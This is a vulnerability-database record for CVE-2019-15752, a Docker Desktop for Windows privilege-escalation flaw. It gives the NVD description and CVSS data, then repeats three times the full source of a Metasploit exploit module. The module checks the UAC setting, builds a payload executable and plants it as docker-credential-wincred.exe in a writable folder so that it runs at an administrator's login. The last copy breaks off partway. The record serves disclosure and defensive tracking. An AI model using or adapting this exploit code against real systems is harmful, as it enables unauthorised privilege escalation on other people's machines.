ID CVE-2019-15752Type cveReporter cve@mitre.orgModified 2020-04-27T17:15:00
Description
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\DockerDesktop\version-bin\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.
{"id": "CVE-2019-15752", "bulletinFamily": "NVD", "title": "CVE-2019-15752", "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.", "published": "2019-08-28T21:15:00", "modified": "2020-04-27T17:15:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15752", "reporter": "cve@mitre.org", "references": ["https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e", "http://packetstormsecurity.com/files/157404/Docker-Credential-Wincred.exe-Privilege-Escalation.html"], "cvelist": ["CVE-2019-15752"], "type": "cve", "lastseen": "2020-04-28T11:41:40", "history": [{"bulletin": {"affectedSoftware": [{"name": "docker docker", "operator": "eq", "version": "1.12.3"}, {"name": "docker docker", "operator": "eq", "version": "1.12.5"}, {"name": "docker docker", "operator": "eq", "version": "1.12.4"}, {"name": "docker docker", "operator": "eq", "version": "2.0.0.0"}, {"name": "docker docker", "operator": "eq", "version": "2.0.0.2"}, {"name": "docker docker", "operator": "eq", "version": "1.13.1"}, {"name": "docker docker", "operator": "eq", "version": "1.12.0"}, {"name": "docker docker", "operator": "eq", "version": "2.0.0.3"}, {"name": "docker docker", "operator": "eq", "version": "1.12.1"}, {"name": "docker docker", "operator": "eq", "version": "1.13.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:docker:docker:1.12.5", "cpe:/a:docker:docker:1.13.0", "cpe:/a:docker:docker:1.12.3", "cpe:/a:docker:docker:1.12.0", "cpe:/a:docker:docker:1.13.1", "cpe:/a:docker:docker:1.12.4", "cpe:/a:docker:docker:2.0.0.3", "cpe:/a:docker:docker:2.0.0.2", "cpe:/a:docker:docker:1.12.1", "cpe:/a:docker:docker:2.0.0.0"], "cpe23": [], "cvelist": ["CVE-2019-15752"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-264"], "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-09-06T10:50:05", "references": [{"idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/DOCKER_CREDENTIAL_WINCRED"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2019-09-06T10:50:05", "rev": 2, "value": 4.8, "vector": "NONE"}}, "hash": "16054e14bf099a8be8aff568fcd4b90bf5841fbc1446c007e3b99d7d7489b736", "hashmap": [{"hash": "311d3b3e4add56da9131903bd82e0132", "key": "description"}, {"hash": "8c9726b3ca89a3c37026d94a96ce5cb2", "key": "title"}, {"hash": "26f338b95fa1d6f598ba1e3d1ba2ee53", "key": "cvss3"}, {"hash": "fa12e087f68642fcaefafba0d4583885", "key": "cwe"}, {"hash": "f7873423a90c2c90db1d834b385d2c09", "key": "cpe"}, {"hash": "fec28c4da5cc16996ad2161ab3ea9ae8", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "77dad14be2073bf0d677442e409971e7", "key": "cvss2"}, {"hash": "6a42bc8271e582a91d0e2578c0e20e32", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "a7ecb5a05b9c1625e09728e3ba6314a9", "key": "references"}, {"hash": "3a87fd606560058f719430c08bb68542", "key": "published"}, {"hash": "0bc4c75d7ac74b371802b1b258763e2d", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "bbc0a391752997cc1506976a51396b34", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15752", "id": "CVE-2019-15752", "lastseen": "2019-09-06T10:50:05", "modified": "2019-09-04T13:16:00", "objectVersion": "1.3", "published": "2019-08-28T21:15:00", "references": ["https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e"], "reporter": "cve@mitre.org", "title": "CVE-2019-15752", "type": "cve", "viewCount": 58}, "differentElements": ["references", "modified"], "edition": 4, "lastseen": "2019-09-06T10:50:05"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2019-15752"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-08-31T10:47:53", "references": []}, "score": {"modified": "2019-08-31T10:47:53", "value": 4.9, "vector": "NONE"}}, "hash": "38a21a00f4b25b07964d99f90e28ecce0703687379b10bf1b4b9a321c01ff758", "hashmap": [{"hash": "311d3b3e4add56da9131903bd82e0132", "key": "description"}, {"hash": "8c9726b3ca89a3c37026d94a96ce5cb2", "key": "title"}, {"hash": "fec28c4da5cc16996ad2161ab3ea9ae8", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "6a42bc8271e582a91d0e2578c0e20e32", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "a7ecb5a05b9c1625e09728e3ba6314a9", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "14994cdfeeed8e0c6f99cd79382d3711", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3a87fd606560058f719430c08bb68542", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15752", "id": "CVE-2019-15752", "lastseen": "2019-08-31T10:47:53", "modified": "2019-08-29T12:35:00", "objectVersion": "1.3", "published": "2019-08-28T21:15:00", "references": ["https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e"], "reporter": "cve@mitre.org", "title": "CVE-2019-15752", "type": "cve", "viewCount": 51}, "differentElements": ["cvss", "cvss3", "cvss2", "modified", "cwe"], "edition": 2, "lastseen": "2019-08-31T10:47:53"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2019-15752"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-08-29T10:46:38", "references": []}, "score": {"modified": "2019-08-29T10:46:38", "value": 4.9, "vector": "NONE"}}, "hash": "327b4a0266aa2a62f71dd2caa271024779e62702585656a155d5de5469531216", "hashmap": [{"hash": "311d3b3e4add56da9131903bd82e0132", "key": "description"}, {"hash": "8c9726b3ca89a3c37026d94a96ce5cb2", "key": "title"}, {"hash": "fec28c4da5cc16996ad2161ab3ea9ae8", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "6a42bc8271e582a91d0e2578c0e20e32", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "a7ecb5a05b9c1625e09728e3ba6314a9", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3a87fd606560058f719430c08bb68542", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "3a87fd606560058f719430c08bb68542", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15752", "id": "CVE-2019-15752", "lastseen": "2019-08-29T10:46:38", "modified": "2019-08-28T21:15:00", "objectVersion": "1.3", "published": "2019-08-28T21:15:00", "references": ["https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e"], "reporter": "cve@mitre.org", "title": "CVE-2019-15752", "type": "cve", "viewCount": 51}, "differentElements": ["modified"], "edition": 1, "lastseen": "2019-08-29T10:46:38"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2019-15752"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-264"], "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-09-05T10:50:05", "references": []}, "score": {"modified": "2019-09-05T10:50:05", "value": 4.9, "vector": "NONE"}}, "hash": "481bc29384565121132c0df1b973969a21d4284043fef6549c42717ade249808", "hashmap": [{"hash": "311d3b3e4add56da9131903bd82e0132", "key": "description"}, {"hash": "8c9726b3ca89a3c37026d94a96ce5cb2", "key": "title"}, {"hash": "26f338b95fa1d6f598ba1e3d1ba2ee53", "key": "cvss3"}, {"hash": "fa12e087f68642fcaefafba0d4583885", "key": "cwe"}, {"hash": "fec28c4da5cc16996ad2161ab3ea9ae8", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "77dad14be2073bf0d677442e409971e7", "key": "cvss2"}, {"hash": "6a42bc8271e582a91d0e2578c0e20e32", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "a7ecb5a05b9c1625e09728e3ba6314a9", "key": "references"}, {"hash": "3a87fd606560058f719430c08bb68542", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "bbc0a391752997cc1506976a51396b34", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15752", "id": "CVE-2019-15752", "lastseen": "2019-09-05T10:50:05", "modified": "2019-09-04T13:16:00", "objectVersion": "1.3", "published": "2019-08-28T21:15:00", "references": ["https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e"], "reporter": "cve@mitre.org", "title": "CVE-2019-15752", "type": "cve", "viewCount": 51}, "differentElements": ["cpe", "affectedSoftware"], "edition": 3, "lastseen": "2019-09-05T10:50:05"}], "edition": 5, "hashmap": [{"key": "affectedSoftware", "hash": "0bc4c75d7ac74b371802b1b258763e2d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "f7873423a90c2c90db1d834b385d2c09"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "6a42bc8271e582a91d0e2578c0e20e32"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "77dad14be2073bf0d677442e409971e7"}, {"key": "cvss3", "hash": "26f338b95fa1d6f598ba1e3d1ba2ee53"}, {"key": "cwe", "hash": "fa12e087f68642fcaefafba0d4583885"}, {"key": "description", "hash": "311d3b3e4add56da9131903bd82e0132"}, {"key": "href", "hash": "fec28c4da5cc16996ad2161ab3ea9ae8"}, {"key": "modified", "hash": "343075ad1946c6f9debe503a34016f03"}, {"key": "published", "hash": "3a87fd606560058f719430c08bb68542"}, {"key": "references", "hash": "a2defd659ac7ddaee6a083d2dd72dec8"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "8c9726b3ca89a3c37026d94a96ce5cb2"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "8741f84a30fc3c3cd11a85af34c7537e67193cefc6d467adfb44d982f9dead64", "viewCount": 96, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:48388"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/DOCKER_CREDENTIAL_WINCRED"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157404"]}], "modified": "2020-04-28T11:41:40", "rev": 2}, "score": {"value": 5.5, "vector": "NONE", "modified": "2020-04-28T11:41:40", "rev": 2}, "vulnersScore": 5.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:docker:docker:1.12.5", "cpe:/a:docker:docker:1.13.0", "cpe:/a:docker:docker:1.12.3", "cpe:/a:docker:docker:1.12.0", "cpe:/a:docker:docker:1.13.1", "cpe:/a:docker:docker:1.12.4", "cpe:/a:docker:docker:2.0.0.3", "cpe:/a:docker:docker:2.0.0.2", "cpe:/a:docker:docker:1.12.1", "cpe:/a:docker:docker:2.0.0.0"], "affectedSoftware": [{"name": "docker docker", "operator": "eq", "version": "1.12.3"}, {"name": "docker docker", "operator": "eq", "version": "1.12.5"}, {"name": "docker docker", "operator": "eq", "version": "1.12.4"}, {"name": "docker docker", "operator": "eq", "version": "2.0.0.0"}, {"name": "docker docker", "operator": "eq", "version": "2.0.0.2"}, {"name": "docker docker", "operator": "eq", "version": "1.13.1"}, {"name": "docker docker", "operator": "eq", "version": "1.12.0"}, {"name": "docker docker", "operator": "eq", "version": "2.0.0.3"}, {"name": "docker docker", "operator": "eq", "version": "1.12.1"}, {"name": "docker docker", "operator": "eq", "version": "1.13.0"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-264"], "scheme": null}
{"exploitdb": [{"lastseen": "2020-04-28T13:10:26", "bulletinFamily": "exploit", "description": "", "modified": "2020-04-28T00:00:00", "published": "2020-04-28T00:00:00", "id": "EDB-ID:48388", "href": "https://www.exploit-db.com/exploits/48388", "type": "exploitdb", "title": "Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Post::Windows::Priv\r\n include Post::Windows::Runas\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',\r\n 'Description' => %q{\r\n This exploit leverages a vulnerability in docker desktop\r\n community editions prior to 2.1.0.1 where an attacker can write\r\n a payload to a lower-privileged area to be executed\r\n automatically by the docker user at login.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Morgan Roman', # discovery\r\n 'bwatters-r7', # metasploit module\r\n ],\r\n 'Platform' => ['win'],\r\n 'SessionTypes' => ['meterpreter'],\r\n 'Targets' => [[ 'Automatic', {} ]],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'WfsDelay' => 15\r\n },\r\n 'DisclosureDate' => '2019-07-05',\r\n 'Notes' =>\r\n {\r\n 'SideEffects' => [ ARTIFACTS_ON_DISK ]\r\n },\r\n 'References' => [\r\n ['CVE', '2019-15752'],\r\n ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']\r\n ]\r\n )\r\n )\r\n register_options(\r\n [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]\r\n )\r\n end\r\n\r\n def docker_version\r\n output = cmd_exec('cmd.exe', '/c docker -v')\r\n vprint_status(output)\r\n version_string = output.match(/(\\d+\\.)(\\d+\\.)(\\d)/)[0]\r\n Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))\r\n end\r\n\r\n def check\r\n if docker_version <= Gem::Version.new('18.09.0')\r\n return CheckCode::Appears\r\n end\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n check_permissions!\r\n case get_uac_level\r\n when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,\r\n UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,\r\n UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT\r\n fail_with(Failure::NotVulnerable,\r\n \"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...\")\r\n when UAC_DEFAULT\r\n print_good('UAC is set to Default')\r\n print_good('BypassUAC can bypass this setting, continuing...')\r\n when UAC_NO_PROMPT\r\n print_warning('UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead')\r\n shell_execute_exe\r\n return\r\n end\r\n\r\n # make payload\r\n docker_path = expand_path(\"#{datastore['PROGRAMDATA']}\\\\DockerDesktop\\\\version-bin\")\r\n fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)\r\n payload_name = 'docker-credential-wincred.exe'\r\n payload_pathname = \"#{docker_path}\\\\#{payload_name}\"\r\n vprint_status('Making Payload')\r\n payload = generate_payload_exe\r\n\r\n # upload Payload\r\n vprint_status(\"Uploading Payload to #{payload_pathname}\")\r\n write_file(payload_pathname, payload)\r\n vprint_status('Payload Upload Complete')\r\n print_status('Waiting for user to attempt to login')\r\n end\r\n\r\n def check_permissions!\r\n unless check == Exploit::CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\r\n end\r\n fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?\r\n # Check if you are an admin\r\n # is_in_admin_group can be nil, true, or false\r\n end\r\nend", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48388"}], "metasploit": [{"lastseen": "2020-05-30T04:10:26", "bulletinFamily": "exploit", "description": "This exploit leverages a vulnerability in docker desktop community editions prior to 2.1.0.1 where an attacker can write a payload to a lower-privileged area to be executed automatically by the docker user at login.\n", "modified": "2020-04-24T14:56:42", "published": "2020-04-15T21:52:45", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/DOCKER_CREDENTIAL_WINCRED", "href": "", "type": "metasploit", "title": "Docker-Credential-Wincred.exe Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Post::Windows::Priv\n include Post::Windows::Runas\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',\n 'Description' => %q{\n This exploit leverages a vulnerability in docker desktop\n community editions prior to 2.1.0.1 where an attacker can write\n a payload to a lower-privileged area to be executed\n automatically by the docker user at login.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Morgan Roman', # discovery\n 'bwatters-r7', # metasploit module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Targets' => [[ 'Automatic', {} ]],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'WfsDelay' => 15\n },\n 'DisclosureDate' => '2019-07-05',\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ]\n },\n 'References' => [\n ['CVE', '2019-15752'],\n ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']\n ]\n )\n )\n register_options(\n [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]\n )\n end\n\n def docker_version\n output = cmd_exec('cmd.exe', '/c docker -v')\n vprint_status(output)\n version_string = output.match(/(\\d+\\.)(\\d+\\.)(\\d)/)[0]\n Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))\n end\n\n def check\n if docker_version <= Gem::Version.new('18.09.0')\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n check_permissions!\n case get_uac_level\n when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,\n UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,\n UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT\n fail_with(Failure::NotVulnerable,\n \"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...\")\n when UAC_DEFAULT\n print_good('UAC is set to Default')\n print_good('BypassUAC can bypass this setting, continuing...')\n when UAC_NO_PROMPT\n print_warning('UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead')\n shell_execute_exe\n return\n end\n\n # make payload\n docker_path = expand_path(\"#{datastore['PROGRAMDATA']}\\\\DockerDesktop\\\\version-bin\")\n fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)\n payload_name = 'docker-credential-wincred.exe'\n payload_pathname = \"#{docker_path}\\\\#{payload_name}\"\n vprint_status('Making Payload')\n payload = generate_payload_exe\n\n # upload Payload\n vprint_status(\"Uploading Payload to #{payload_pathname}\")\n write_file(payload_pathname, payload)\n vprint_status('Payload Upload Complete')\n print_status('Waiting for user to attempt to login')\n end\n\n def check_permissions!\n unless check == Exploit::CheckCode::Appears\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\n end\n fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?\n # Check if you are an admin\n # is_in_admin_group can be nil, true, or false\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/docker_credential_wincred.rb"}], "packetstorm": [{"lastseen": "2020-04-27T23:20:27", "bulletinFamily": "exploit", "description": "", "modified": "2020-04-27T00:00:00", "published": "2020-04-27T00:00:00", "id": "PACKETSTORM:157404", "href": "https://packetstormsecurity.com/files/157404/Docker-Credential-Wincred.exe-Privilege-Escalation.html", "title": "Docker-Credential-Wincred.exe Privilege Escalation", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Post::Windows::Priv \ninclude Post::Windows::Runas \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation', \n'Description' => %q{ \nThis exploit leverages a vulnerability in docker desktop \ncommunity editions prior to 2.1.0.1 where an attacker can write \na payload to a lower-privileged area to be executed \nautomatically by the docker user at login. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Morgan Roman', # discovery \n'bwatters-r7', # metasploit module \n], \n'Platform' => ['win'], \n'SessionTypes' => ['meterpreter'], \n'Targets' => [[ 'Automatic', {} ]], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'WfsDelay' => 15 \n}, \n'DisclosureDate' => '2019-07-05', \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ] \n}, \n'References' => [ \n['CVE', '2019-15752'], \n['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e'] \n] \n) \n) \nregister_options( \n[OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])] \n) \nend \n \ndef docker_version \noutput = cmd_exec('cmd.exe', '/c docker -v') \nvprint_status(output) \nversion_string = output.match(/(\\d+\\.)(\\d+\\.)(\\d)/)[0] \nGem::Version.new(version_string.split('.').map(&:to_i).join('.')) \nend \n \ndef check \nif docker_version <= Gem::Version.new('18.09.0') \nreturn CheckCode::Appears \nend \n \nCheckCode::Safe \nend \n \ndef exploit \ncheck_permissions! \ncase get_uac_level \nwhen UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, \nUAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, \nUAC_PROMPT_CREDS, UAC_PROMPT_CONSENT \nfail_with(Failure::NotVulnerable, \n\"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...\") \nwhen UAC_DEFAULT \nprint_good('UAC is set to Default') \nprint_good('BypassUAC can bypass this setting, continuing...') \nwhen UAC_NO_PROMPT \nprint_warning('UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead') \nshell_execute_exe \nreturn \nend \n \n# make payload \ndocker_path = expand_path(\"#{datastore['PROGRAMDATA']}\\\\DockerDesktop\\\\version-bin\") 